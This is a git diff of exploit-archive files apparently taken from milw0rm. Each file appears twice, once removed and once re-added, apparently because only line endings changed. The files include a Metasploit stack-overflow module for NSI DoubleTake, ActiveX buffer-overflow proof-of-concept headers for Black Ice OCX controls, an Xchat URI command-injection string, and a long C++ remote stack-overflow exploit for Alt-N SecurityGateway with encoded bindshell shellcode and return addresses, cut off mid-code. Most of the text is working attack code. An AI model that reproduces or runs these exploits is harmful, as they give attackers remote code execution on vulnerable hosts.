b/platforms/windows/remote/572.pl @@ -33,6 +33,6 @@ print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n"; print "\n--zzz--\n"; - - -# milw0rm.com [2004-10-11] + + +# milw0rm.com [2004-10-11] 
diff --git a/platforms/windows/remote/5732.html b/platforms/windows/remote/5732.html index d90802101..0de831cd8 100755 --- a/platforms/windows/remote/5732.html +++ b/platforms/windows/remote/5732.html @@ -1,67 +1,67 @@ - - - - - - - - - - - - - - - - - - - - -# milw0rm.com [2008-06-03] + + + + + + + + + + + + + + + + + + + + +# milw0rm.com [2008-06-03] diff --git a/platforms/windows/remote/5738.rb b/platforms/windows/remote/5738.rb index eaa6ff77e..3b2d36279 100755 --- a/platforms/windows/remote/5738.rb +++ b/platforms/windows/remote/5738.rb 
@@ -1,87 +1,87 @@ -## -# $Id: doubletake.rb 4529 2007-03-23 01:08:18Z $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/projects/Framework/ -## - - -require 'msf/core' - -module Msf - -class Exploits::Windows::Misc::Doubletake < Msf::Exploit::Remote - include Exploit::Remote::Tcp - include Exploit::Remote::Seh - def initialize(info = {}) - super(update_info(info, - 'Name' => 'doubletake Overflow', - 'Description' => %q{ - This Module Exploits a stack overflow in the authentication mechanism of NSI Doubletake which is also rebranded - as hp storage works Vulnerability found by Titon of Bastard Labs. - }, - 'Author' => [ 'ri0t ' ], - 'Version' => '$Revision: 9 $', - 'References' => - [ - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 500, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - - 'Targets' => - [ - ['doubletake 4.5.0', { 'Ret' => 0x006f5fa7, 'Offset' => 5544 } ], - ['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ], - ['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ], - ], - 'DefaultTarget' => 0, - - 'Privileged' => false, - - 'DisclosureDate' => '' - - )) - - register_options( - [ - Opt::RPORT(1100) - ], self.class) - end - - def exploit - xor = Rex::Encoding::Xor::Byte - connect - - print_status("Trying target #{target.name}...") - - header = - "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+ - "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01" - - filler = rand_text_english(1) * (target['Offset']) - seh = generate_seh_payload(target.ret) - buffercoded= xor.encode(seh+payload.encoded, [0xf0].pack("C")) - sploit = header + 
filler + buffercoded[0] - sock.put(sploit) - handler - disconnect - end - -end -end - -# milw0rm.com [2008-06-04] +## +# $Id: doubletake.rb 4529 2007-03-23 01:08:18Z $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'msf/core' + +module Msf + +class Exploits::Windows::Misc::Doubletake < Msf::Exploit::Remote + include Exploit::Remote::Tcp + include Exploit::Remote::Seh + def initialize(info = {}) + super(update_info(info, + 'Name' => 'doubletake Overflow', + 'Description' => %q{ + This Module Exploits a stack overflow in the authentication mechanism of NSI Doubletake which is also rebranded + as hp storage works Vulnerability found by Titon of Bastard Labs. + }, + 'Author' => [ 'ri0t ' ], + 'Version' => '$Revision: 9 $', + 'References' => + [ + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 500, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + + 'Targets' => + [ + ['doubletake 4.5.0', { 'Ret' => 0x006f5fa7, 'Offset' => 5544 } ], + ['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ], + ['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ], + ], + 'DefaultTarget' => 0, + + 'Privileged' => false, + + 'DisclosureDate' => '' + + )) + + register_options( + [ + Opt::RPORT(1100) + ], self.class) + end + + def exploit + xor = Rex::Encoding::Xor::Byte + connect + + print_status("Trying target #{target.name}...") + + header = + "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+ + "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01" + + filler = rand_text_english(1) * (target['Offset']) + seh = 
generate_seh_payload(target.ret) + buffercoded= xor.encode(seh+payload.encoded, [0xf0].pack("C")) + sploit = header + filler + buffercoded[0] + sock.put(sploit) + handler + disconnect + end + +end +end + +# milw0rm.com [2008-06-04] diff --git a/platforms/windows/remote/5741.html b/platforms/windows/remote/5741.html index 7a00ee351..b7beb42d4 100755 --- a/platforms/windows/remote/5741.html +++ b/platforms/windows/remote/5741.html @@ -1,303 +1,303 @@ - - - - - - - - - - - - - Download Manager - - - - - - - - - - - - - - - - - - - - - - - - -
    -About the Download Manager
    -

    The Download Manager provides for more effective, more efficient file downloads than you normally see with your browser, especially for large files or file sets. It can pause and restart downloads even if you turn your computer off and on again. You will be presented with a security warning and after you accept, the Download Manager will install and begin to download the requested file.

    -

    Should the Download Manager fail to start, or if you do not accept the security certificate, you can click here to download the file without using the download manager.

    -

    - - - - - - -
    - - - - - - - -# milw0rm.com [2008-06-04] + + + + + + + + + + + + + Download Manager + + + + + + + + + + + + + + + + + + + + + + + + +
    +About the Download Manager
    +

    The Download Manager provides for more effective, more efficient file downloads than you normally see with your browser, especially for large files or file sets. It can pause and restart downloads even if you turn your computer off and on again. You will be presented with a security warning and after you accept, the Download Manager will install and begin to download the requested file.

    +

    Should the Download Manager fail to start, or if you do not accept the security certificate, you can click here to download the file without using the download manager.

    +

    + + + + + + +
    + + + + + + + +# milw0rm.com [2008-06-04] diff --git a/platforms/windows/remote/5746.html b/platforms/windows/remote/5746.html index 5e3502c95..bda61f3e1 100755 --- a/platforms/windows/remote/5746.html +++ b/platforms/windows/remote/5746.html 
@@ -1,85 +1,85 @@ ----------------------------------------------------------------------------- - Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote Buffer Overflow - url: http://www.blackice.com - - File : BITiff.ocx - Ver. : 10.9.3.0 - CLSID: {2324B5B7-D3EF-464C-BB35-06EFF8F11EB3} - - Mark.: RegKey Safe for Script: True - RegKey Safe for Init: True - Implements IObjectSafety: False - - Author: shinnai - mail: shinnai[at]autistici[dot]org - site: http://shinnai.altervista.org - - This was written for educational purpose. Use it at your own risk. - Author will be not responsible for any damage. - - Windows XP Professional SP3 fully patched, with Internet Explorer 7 - Windows 2k Professional SP4 fully patched, with Internet Explorer 6 - - In memory of rgod ------------------------------------------------------------------------------ - - - - - - -# milw0rm.com [2008-06-05] +---------------------------------------------------------------------------- + Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote Buffer Overflow + url: http://www.blackice.com + + File : BITiff.ocx + Ver. : 10.9.3.0 + CLSID: {2324B5B7-D3EF-464C-BB35-06EFF8F11EB3} + + Mark.: RegKey Safe for Script: True + RegKey Safe for Init: True + Implements IObjectSafety: False + + Author: shinnai + mail: shinnai[at]autistici[dot]org + site: http://shinnai.altervista.org + + This was written for educational purpose. Use it at your own risk. + Author will be not responsible for any damage. + + Windows XP Professional SP3 fully patched, with Internet Explorer 7 + Windows 2k Professional SP4 fully patched, with Internet Explorer 6 + + In memory of rgod +----------------------------------------------------------------------------- + + + + + + +# milw0rm.com [2008-06-05] diff --git a/platforms/windows/remote/5747.html b/platforms/windows/remote/5747.html index b4fb0e22a..1dcebed81 100755 --- a/platforms/windows/remote/5747.html +++ b/platforms/windows/remote/5747.html 
@@ -1,64 +1,64 @@ - Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote Buffer Overflow - url: http://www.blackice.com - - File : BITiff.ocx - Ver. : 10.9.3.0 - CLSID: {2324B5B7-D3EF-464C-BB35-06EFF8F11EB3} - - Mark.: RegKey Safe for Script: True - RegKey Safe for Init: True - Implements IObjectSafety: False - - Author: shinnai - mail: shinnai[at]autistici[dot]org - site: http://shinnai.altervista.org - - This was written for educational purpose. Use it at your own risk. - Author will be not responsible for any damage. - - Windows XP Professional SP3 fully patched, with Internet Explorer 7 - - In memory of rgod ------------------------------------------------------------------------------ - - - - - - -# milw0rm.com [2008-06-05] + Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote Buffer Overflow + url: http://www.blackice.com + + File : BITiff.ocx + Ver. : 10.9.3.0 + CLSID: {2324B5B7-D3EF-464C-BB35-06EFF8F11EB3} + + Mark.: RegKey Safe for Script: True + RegKey Safe for Init: True + Implements IObjectSafety: False + + Author: shinnai + mail: shinnai[at]autistici[dot]org + site: http://shinnai.altervista.org + + This was written for educational purpose. Use it at your own risk. + Author will be not responsible for any damage. + + Windows XP Professional SP3 fully patched, with Internet Explorer 7 + + In memory of rgod +----------------------------------------------------------------------------- + + + + + + +# milw0rm.com [2008-06-05] diff --git a/platforms/windows/remote/5750.html b/platforms/windows/remote/5750.html index df94b814c..4598f2c06 100755 --- a/platforms/windows/remote/5750.html +++ b/platforms/windows/remote/5750.html 
@@ -1,48 +1,48 @@ ------------------------------------------------------------------------------ - Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download - and Memory Corruption - url: http://www.blackice.com - - File : BIDIB.ocx - Ver. : 10.9.3.0 - CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9} - - Mark.: RegKey Safe for Script: True - RegKey Safe for Init: True - Implements IObjectSafety: False - - Author: shinnai - mail: shinnai[at]autistici[dot]org - site: http://shinnai.altervista.org - - This was written for educational purpose. Use it at your own risk. - Author will be not responsible for any damage. - - Windows XP Professional SP3 fully patched, with Internet Explorer 7 - Windows 2k Professional SP3 fully patched, with Internet Explorer 6 - - In memory of rgod ------------------------------------------------------------------------------ - - - - - - - - - - -# milw0rm.com [2008-06-05] +----------------------------------------------------------------------------- + Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download + and Memory Corruption + url: http://www.blackice.com + + File : BIDIB.ocx + Ver. : 10.9.3.0 + CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9} + + Mark.: RegKey Safe for Script: True + RegKey Safe for Init: True + Implements IObjectSafety: False + + Author: shinnai + mail: shinnai[at]autistici[dot]org + site: http://shinnai.altervista.org + + This was written for educational purpose. Use it at your own risk. + Author will be not responsible for any damage. + + Windows XP Professional SP3 fully patched, with Internet Explorer 7 + Windows 2k Professional SP3 fully patched, with Internet Explorer 6 + + In memory of rgod +----------------------------------------------------------------------------- + + + + + + + + + + +# milw0rm.com [2008-06-05] diff --git a/platforms/windows/remote/577.c b/platforms/windows/remote/577.c index df9dc656d..e6f697532 100755 --- a/platforms/windows/remote/577.c 
+++ b/platforms/windows/remote/577.c @@ -127,6 +127,6 @@ cout<<" ===YahooPOPS <= v1.6, SMTP Remote Buffer Overflow Exploit==="<
    - - - - - -# milw0rm.com [2008-06-10] +-------------------------------------------------------------------------- + Black Ice Software Annotation Plugin (BiAnno.ocx) Remote Buffer Overflow + url: http://www.blackice.com + + File : BiAnno.ocx + Ver. : 10.9.5.0 + CLSID: {B27DC3CE-FF81-4DCF-9B80-0E69D61BED2A} + + Mark.: RegKey Safe for Script: True + RegKey Safe for Init: True + Implements IObjectSafety: False + + Author: shinnai + mail: shinnai[at]autistici[dot]org + site: http://shinnai.altervista.org + + This was written for educational purpose. Use it at your own risk. + Author will be not responsible for any damage. + + Windows XP Professional SP3 fully patched, with Internet Explorer 7 + Windows 2k Professional SP4 fully patched, with Internet Explorer 6 + + In memory of rgod +-------------------------------------------------------------------------- + + + + + + +# milw0rm.com [2008-06-10] diff --git a/platforms/windows/remote/5778.html b/platforms/windows/remote/5778.html index e4fe9cd86..b80eb03c0 100755 --- a/platforms/windows/remote/5778.html +++ b/platforms/windows/remote/5778.html 
@@ -1,68 +1,68 @@ ------------------------------------------------------------------------------- - Black Ice Software Annotation Plugin (BiAnno.ocx) Remote Buffer Overflow (2) - url: http://www.blackice.com - - File : BiAnno.ocx - Ver. : 10.9.5.0 - CLSID: {B27DC3CE-FF81-4DCF-9B80-0E69D61BED2A} - - Mark.: RegKey Safe for Script: True - RegKey Safe for Init: True - Implements IObjectSafety: False - - Author: shinnai - mail: shinnai[at]autistici[dot]org - site: http://shinnai.altervista.org - - This was written for educational purpose. Use it at your own risk. - Author will be not responsible for any damage. - - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 - - In memory of rgod ------------------------------------------------------------------------------- - - - - - - -# milw0rm.com [2008-06-10] +------------------------------------------------------------------------------ + Black Ice Software Annotation Plugin (BiAnno.ocx) Remote Buffer Overflow (2) + url: http://www.blackice.com + + File : BiAnno.ocx + Ver. : 10.9.5.0 + CLSID: {B27DC3CE-FF81-4DCF-9B80-0E69D61BED2A} + + Mark.: RegKey Safe for Script: True + RegKey Safe for Init: True + Implements IObjectSafety: False + + Author: shinnai + mail: shinnai[at]autistici[dot]org + site: http://shinnai.altervista.org + + This was written for educational purpose. Use it at your own risk. + Author will be not responsible for any damage. + + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 + + In memory of rgod +------------------------------------------------------------------------------ + + + + + + +# milw0rm.com [2008-06-10] diff --git a/platforms/windows/remote/5793.html b/platforms/windows/remote/5793.html index 20a565013..3caf3e883 100755 --- a/platforms/windows/remote/5793.html +++ b/platforms/windows/remote/5793.html @@ -1,71 +1,71 @@ - - - - - - - -# milw0rm.com [2008-06-12] + + + + + + + +# milw0rm.com [2008-06-12] 
diff --git a/platforms/windows/remote/5795.html b/platforms/windows/remote/5795.html index 2b8aaabf0..608cce348 100755 --- a/platforms/windows/remote/5795.html +++ b/platforms/windows/remote/5795.html 
@@ -1,35 +1,35 @@ -################################################################################################################## -# -# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched) -# Vendor : http://xchat.org/ -# Affected Os : Windows * -# Risk : critical -# -# This bug is related to the URI Handler vulnerability but the approch is a bit different. -# We don't use any % or ../../../ as the others related bugs, just a single " -# According to the registry , when the IRCS:// URI is called , the command launched is : -# C:\Program Files\xchat\xchat.exe --existing --url="%1" -# -# The xchat --help option tells us : -# " --command=COMMAND :Send a command to existing xchat " -# -# So we add a simple " at the end of the URL and we're in business ? -# Yep =) ircs://blabla@3.3.3.3" --command "shell calc" -# -# Note: The victim needs to be connected to an irc server , and also need IE * . -# -# -# -# Greetz: French/Quebec community, http://spiritofhack.net/ -# -# "If in times like theses you can talk about individual freedoom, you're propably a terrorist" -# -# Poc: this only launch the calc, sky is the limit passed this point. - -Welcome to my personal website - - - - - -# milw0rm.com [2008-06-13] +################################################################################################################## +# +# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched) +# Vendor : http://xchat.org/ +# Affected Os : Windows * +# Risk : critical +# +# This bug is related to the URI Handler vulnerability but the approch is a bit different. 
+# We don't use any % or ../../../ as the others related bugs, just a single " +# According to the registry , when the IRCS:// URI is called , the command launched is : +# C:\Program Files\xchat\xchat.exe --existing --url="%1" +# +# The xchat --help option tells us : +# " --command=COMMAND :Send a command to existing xchat " +# +# So we add a simple " at the end of the URL and we're in business ? +# Yep =) ircs://blabla@3.3.3.3" --command "shell calc" +# +# Note: The victim needs to be connected to an irc server , and also need IE * . +# +# +# +# Greetz: French/Quebec community, http://spiritofhack.net/ +# +# "If in times like theses you can talk about individual freedoom, you're propably a terrorist" +# +# Poc: this only launch the calc, sky is the limit passed this point. + +Welcome to my personal website + + + + + +# milw0rm.com [2008-06-13] diff --git a/platforms/windows/remote/582.c b/platforms/windows/remote/582.c index c750fcd3f..7720d40fc 100755 --- a/platforms/windows/remote/582.c +++ b/platforms/windows/remote/582.c @@ -110,6 +110,6 @@ void ver() printf ("# dcrab@hackerscenter.com www.hackerscenter.com #\n"); printf ("# Credits to Behrang Fouladi for finding this bug #\n"); printf ("################################################################\n"); -} - -// milw0rm.com [2004-10-18] +} + +// milw0rm.com [2004-10-18] diff --git a/platforms/windows/remote/5827.cpp b/platforms/windows/remote/5827.cpp index c440ff18f..906739abd 100755 --- a/platforms/windows/remote/5827.cpp +++ b/platforms/windows/remote/5827.cpp 
@@ -1,612 +1,612 @@ -/* Dreatica-FXP crew -* -* ---------------------------------------- -* Target : Alt-N SecurityGateway v1.00-1.01 -* ---------------------------------------- -* Exploit : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit -* Exploit date : 11.06.2008-14.06.2008 -* Exploit writer : Heretic2 (heretic2x@gmail.com) -* OS : Windows ALL -* Crew : Dreatica-FXP -* ---------------------------------------- -* Details : Obtain the overflow and crash the application is peace a cake job. -* To make a wroking code execution here is a hell. First we can see that -* the username before overflow the buffer pass through some functions, -* that changes and restrict some useful chars. Firstly the beffer gets -* lowered so the overflow should not contain upper chars :( . So i decided -* to use some encoders for the payload like nonupper and non alpha from MSF. -* The nonupper use the `@` (0x40) char which the app doesn't eat at all. -* The nonalpha encoder in decoder code and the generated body contained -* always the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1, -* 0x90, 0x91. Don't know, may be this chars translation was due to my russian locale. -* After few days of work i have comed with the required bindshell which bypass -* all restricted chars and executes. Thx to skylined, for his alpha tool. -* Bad chars : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E -* 0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0 -* 0xC1 0xC2 0x80 0x81 -* ---------------------------------------- -* Thanks to: -* 1. securfrog ( ) -* 2. ALPHA 2: Zero-tolerance ( ) -* 3. The Metasploit project ( http://metasploit.com ) -* 4. Dreatica-FXP crew ( http://www.dreatica-fxp.com ) -************************************************************************************ -* This was written for educational purpose only. Use it at your own risk. 
Author will be not be -* responsible for any damage, caused by that code. -*/ - -#include -#include -#include -#include -#include - -#pragma comment(lib,"ws2_32") - - -void usage(char * s); -void logo(); -void end_logo(); -void print_info_banner_line(const char * key, const char * val); - -void extract_ip_and_port( char * &remotehost, int * port, char * str); -int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx); - -int hr2_connect(char * remotehost, int port, int timeout); -int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout); -int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout); -int execute(struct _buf * abuf, char * remotehost, int port); - -struct _buf -{ - unsigned char * ptr; - unsigned int size; -}; -int construct_shellcode(int sh, struct _buf * shf, int target); -int construct_buffer(struct _buf * shf, int target, struct _buf * abuf); - - - - -// ----------------------------------------------------------------- -// XGetopt.cpp Version 1.2 -// ----------------------------------------------------------------- -int getopt(int argc, char *argv[], char *optstring); -char *optarg; // global argument pointer -int optind = 0, opterr; // global argv index -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- - - -struct { - const char * name; - int length; - char *shellcode; -}shellcodes[]={ - {"Bindshell, port 9998", 743, - /* The non-encoded metasploit payload - * windows/shell_bind_tcp - 317 bytes - * http://www.metasploit.com - * Encoder: generic/none - */ - /* - * Encoder: heretic2's nonupper. with help of skylined tool. 
- */ - "\x6a\x20\x5b\x93\xf7\xe0\x91\xe8\xff\xff\xff\xff\x30\x5e\x5e\x66" - "\x8b\x7e\x22\x97\x3c\x60\x7c\x07\x2c\x20\x66\x93\x88\x5e\x22\x83" - "\xee\xff\xe2\xeb\xe8\xff\xff\xff\xff\x36\x5b\x5b\x93\x91\x83\xe9" - "\xf8\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x71\x7a\x76\x74" - "\x78\x33\x30\x76\x78\x34\x61\x70\x30\x61\x33\x68\x68\x30\x61\x30" - "\x30\x61\x62\x61\x61\x62\x74\x61\x61\x71\x32\x61\x62\x32\x62\x62" - "\x30\x62\x62\x78\x70\x38\x61\x63\x6a\x6a\x69\x6b\x6c\x32\x6a\x6a" - "\x6b\x70\x6d\x6a\x68\x7a\x79\x6b\x6f\x6b\x6f\x6b\x6f\x33\x70\x6c" - "\x6b\x72\x6c\x36\x64\x71\x34\x6c\x6b\x71\x75\x77\x6c\x6c\x6b\x73" - "\x6c\x73\x35\x33\x68\x35\x71\x7a\x6f\x6c\x6b\x70\x6f\x35\x68\x6c" - "\x6b\x71\x6f\x67\x70\x75\x71\x6a\x6b\x77\x39\x6c\x6b\x77\x64\x6c" - "\x6b\x75\x71\x7a\x6e\x76\x71\x69\x70\x6d\x69\x6e\x6c\x6b\x34\x69" - "\x70\x72\x74\x63\x37\x6f\x31\x38\x6a\x74\x6d\x35\x71\x79\x72\x6a" - "\x6b\x6b\x64\x77\x6b\x71\x64\x67\x74\x67\x78\x32\x75\x6d\x35\x6c" - "\x6b\x71\x6f\x77\x74\x35\x71\x6a\x6b\x32\x66\x6c\x6b\x74\x6c\x70" - "\x6b\x6c\x6b\x71\x6f\x35\x6c\x75\x71\x6a\x6b\x75\x73\x66\x6c\x6c" - "\x6b\x6b\x39\x62\x6c\x76\x64\x75\x6c\x33\x71\x6f\x33\x66\x71\x79" - "\x6b\x75\x34\x6c\x6b\x71\x73\x36\x70\x6c\x6b\x71\x70\x74\x6c\x6c" - "\x6b\x72\x70\x75\x6c\x6e\x6d\x6c\x6b\x71\x70\x35\x78\x71\x6e\x73" - "\x78\x6c\x6e\x70\x6e\x64\x6e\x7a\x6c\x30\x70\x6b\x6f\x78\x76\x35" - "\x36\x76\x33\x32\x66\x33\x78\x70\x33\x77\x62\x72\x68\x72\x77\x34" - "\x33\x76\x72\x71\x6f\x70\x74\x6b\x6f\x78\x70\x62\x68\x38\x6b\x6a" - "\x6d\x6b\x6c\x77\x6b\x66\x30\x6b\x6f\x78\x76\x71\x6f\x6b\x39\x6a" - "\x65\x73\x76\x6d\x71\x7a\x6d\x73\x38\x64\x62\x70\x75\x62\x6a\x35" - "\x72\x6b\x6f\x6e\x30\x72\x68\x78\x79\x75\x79\x6b\x65\x6e\x6d\x66" - "\x37\x6b\x6f\x79\x66\x36\x33\x70\x73\x71\x63\x71\x63\x70\x73\x71" - "\x73\x71\x63\x31\x73\x36\x33\x6b\x6f\x68\x70\x32\x66\x65\x38\x71" - "\x37\x74\x6e\x72\x66\x71\x63\x6b\x39\x6b\x71\x6c\x75\x73\x78\x6f" - 
"\x74\x75\x6a\x74\x30\x6f\x37\x30\x77\x6b\x6f\x79\x66\x32\x6a\x64" - "\x70\x36\x31\x31\x65\x6b\x6f\x6e\x30\x75\x38\x6e\x64\x6e\x6d\x76" - "\x6e\x6b\x79\x71\x67\x6b\x6f\x78\x76\x70\x73\x70\x75\x6b\x6f\x78" - "\x70\x65\x38\x6b\x75\x31\x79\x6c\x66\x70\x69\x30\x77\x6b\x6f\x6e" - "\x36\x70\x70\x31\x64\x71\x64\x76\x35\x6b\x6f\x78\x70\x6c\x73\x72" - "\x68\x6d\x37\x63\x69\x39\x76\x32\x79\x71\x67\x6b\x6f\x6e\x36\x71" - "\x65\x6b\x6f\x78\x70\x73\x76\x73\x7a\x35\x34\x32\x66\x72\x68\x75" - "\x33\x72\x6d\x6d\x79\x6b\x75\x72\x6a\x76\x30\x76\x39\x71\x39\x68" - "\x6c\x6b\x39\x6d\x37\x72\x6a\x30\x64\x6b\x39\x6b\x72\x76\x71\x6f" - "\x30\x7a\x73\x6e\x6a\x6b\x6e\x70\x62\x76\x6d\x6b\x6e\x67\x32\x36" - "\x6c\x6a\x33\x6c\x6d\x33\x6a\x76\x78\x6e\x6b\x6e\x6b\x6e\x6b\x63" - "\x78\x73\x62\x6b\x6e\x6e\x73\x74\x76\x6b\x6f\x62\x75\x70\x64\x6b" - "\x6f\x38\x76\x71\x6b\x76\x37\x76\x32\x30\x71\x30\x71\x70\x71\x72" - "\x6a\x65\x71\x30\x71\x30\x71\x30\x75\x70\x71\x6b\x6f\x78\x70\x75" - "\x38\x6e\x6d\x6e\x39\x74\x65\x78\x6e\x70\x73\x6b\x6f\x6e\x36\x73" - "\x7a\x6b\x6f\x6b\x6f\x36\x77\x6b\x6f\x6e\x30\x6c\x6b\x36\x37\x6b" - "\x6c\x6b\x33\x69\x74\x75\x34\x6b\x6f\x38\x76\x66\x32\x6b\x6f\x38" - "\x70\x33\x78\x7a\x70\x6c\x6a\x63\x34\x71\x6f\x66\x33\x6b\x6f\x6e" - "\x36\x6b\x6f\x68\x70\x61\x61" - }, - {NULL, 0, NULL} -}; - - - - -struct _target{ - const char *t ; - unsigned long ret ; -} targets[]= -{ - {"Alt-N SecurityGateway 1.00/1.01 universal", 0x67672190 }, // nonupper pop/pop/ret - {"DOS/Crash/Debug/Test/Fun", 0x61616161 }, - {NULL, 0x00000000 } -}; - -// memory for buffers -unsigned char payloadbuffer[10000], a_buffer[10000]; -long dwTimeout=5000; -int timeout=5000; - - -int main(int argc, char **argv) -{ - char c,*remotehost=NULL,temp1[100]; - int sh,port=4000,itarget=0; - struct _buf fshellcode, sbuffer; - - logo(); - if(argc<2) - { - usage(argv[0]); - return -1; - } - - WSADATA wsa; - WSAStartup(MAKEWORD(2,0), &wsa); - // set defaults - sh=0; - // ------------ - - while((c = getopt(argc, argv, 
"h:t:R:T:"))!= EOF) - { - switch (c) - { - case 'h': - if (strchr(optarg,':')==NULL) - { - remotehost=optarg; - }else - { - sscanf(strchr(optarg,':')+1, "%d", &port); - remotehost=optarg; - *(strchr(remotehost,':'))='\0'; - } - break; - case 't': - sscanf(optarg, "%d", &itarget); - itarget--; - break; - case 'T': - sscanf(optarg, "%ld", &dwTimeout); - break; - default: - usage(argv[0]); - WSACleanup(); - return -1; - } - } - - if(remotehost == NULL) - { - printf(" [-] Please enter remotehost\n"); - end_logo(); - WSACleanup(); - return -1; - } - print_info_banner_line("Host", remotehost); - sprintf(temp1, "%d", port); - print_info_banner_line("Port", temp1); - print_info_banner_line("Payload", shellcodes[sh].name); - sprintf(temp1, "%d", 9998); - print_info_banner_line("BINDPort", temp1); - - printf(" # ------------------------------------------------------------------- # \n"); - fflush(stdout); - - - memset(payloadbuffer, 0, sizeof(payloadbuffer)); - fshellcode.ptr=payloadbuffer; - fshellcode.size=0; - - memset(a_buffer, 0, sizeof(a_buffer)); - sbuffer.ptr=a_buffer; - sbuffer.size=0; - - if(!construct_shellcode(sh, &fshellcode, itarget)) - { - end_logo(); - WSACleanup(); - return -1; - } - - printf(" [+] Payload constructed\n"); - - if(!construct_buffer(&fshellcode, itarget, &sbuffer)) - { - printf(" [-] Buffer not constructed\n"); - end_logo(); - WSACleanup(); - return -1; - } - printf(" [+] Final buffer constructed\n"); - - - if(!execute(&sbuffer, remotehost, port)) - { - printf(" [-] Buffer not sent\n"); - end_logo(); - WSACleanup(); - return -1; - } - printf(" [+] Buffer sent\n"); - - end_logo(); - WSACleanup(); - return 0; -} - -int construct_shellcode(int sh, struct _buf * shf, int target) -{ - memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length); - shf->size=shellcodes[sh].length; - - return 1; -} - - - -char templ1[] = "POST /SecurityGateway.dll HTTP/1.0\r\n" -"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n" -"Accept-Language: ru\r\n" -"Content-Type: application/x-www-form-urlencoded\r\n" -"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n" -"Content-Length: %d\r\n\r\n"; -char templ2[]="RequestedPage=login&username=%s&passwd=world&lang=en&logon=Sign+In"; - -int encode_uri(char * in, int len, char * out, int *outlen) -{ - char *out2=out; - int i; - memset(out,0,*outlen); - for(i=0;iptr; - - memset(buf,0,sizeof(buf)); - memset(buf2,0,sizeof(buf2)); - memset(rstr1,0,sizeof(rstr1)); - memset(rstr2,0,sizeof(rstr2)); - - lp=buf; - - // overflow - memset(lp,'\x61',476); - lp+=476; - - // jmp over seh - *lp++='\x90'; - *lp++='\x90'; - *lp++='\xeb'; - *lp++='\x04'; - - // replace SEH - *lp++ = (char)((targets[target].ret ) & 0xff); - *lp++ = (char)((targets[target].ret >> 8) & 0xff); - *lp++ = (char)((targets[target].ret >> 16) & 0xff); - *lp++ = (char)((targets[target].ret >> 24) & 0xff); - - memset(lp,'\x90',1500); - lp+=5; - - memcpy(lp, shf->ptr, shf->size); - lp+=shf->size; - - - olen = 1500; - encode_uri(buf, (int)strlen(buf), buf2, &olen); - sprintf(rstr2,templ2,buf2); - sprintf(rstr1,templ1,strlen(rstr2)); - - strcat((char*)cp,rstr1); - strcat((char*)cp,rstr2); - - cp+=strlen((char*)cp); - abuf->size=(int)(cp-abuf->ptr); - return 1; -} - - -void extract_ip_and_port( char * &remotehost, int * port, char * str) -{ - if (strchr(str,':')==NULL) - { - remotehost=str; - }else - { - sscanf(strchr(str,':')+1, "%d", port); - remotehost=str; - *(strchr(remotehost,':'))='\0'; - } -} - - - -int hr2_connect(char * remotehost, int port, int timeout) -{ - SOCKET s; - struct hostent *host; - struct sockaddr_in addr; - TIMEVAL stTime; - TIMEVAL *pstTime = NULL; - fd_set x; - int res; - - if (INFINITE != 